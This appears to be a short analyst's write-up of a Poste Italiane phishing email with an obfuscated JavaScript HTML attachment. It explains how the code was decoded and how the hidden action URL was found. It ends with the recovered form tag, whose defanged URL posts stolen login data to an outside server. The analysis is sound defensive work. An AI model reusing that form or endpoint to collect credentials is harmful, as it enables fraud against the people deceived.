Day by day the victims of Phishing attacks increases in the world of Information Security. Phishing attackers target on the victims generally through spam emails which may contain message that could manipulate the victim to click to the phishing link.
Phishing attacks are commonly used to steal the user’s sensitive information such as bank credentials, credit card information and sometime even to download malware payloads.
Now we have a typical case, where the phish document was attached as an attachment to the spam email as an obfuscated attachment.
This is a phish document of “Poste italiane” (Italian Postal Service Company), where a spam email was sent to the victim with an attachment of Obfuscated Java Script.
The email message is in a way, which tricks the victim to open the HTML attachment with obfuscated JS code.
While viewing the source of HTML file, there is Java Script code which declares an Array of values and then the decrypting function.
To decode the Obfuscated Java Script code, change the “document.write(em)” with “eval(em)”. This will decode the actual HTML code.
The decoded HTML will again display the same Phish HTML layout.
When, analyzing a phish document the most important thing is to identify the action URL. This is the URL to which the information collected is sent.
This URL will be usually available under the code of button like “Accedi” button given this Phish Layout. This button on clicking will validate the information given and send it to the attacker.
In this case, while searching I could not find any visible action URL as the HTML document is coded in such a way, that the analyst cannot identify action URL easily.
Then I found another suspicious which contained a HTML escape character encoding.
Again after decoding it, I got the action URL.
<form id=”datiForm” name=”datiForm” method=”post” action=”hxxp://www.delletredonzelle.it/contatti/jquery.ui.widget.config.php” onsubmit=”return form_submit(this);”>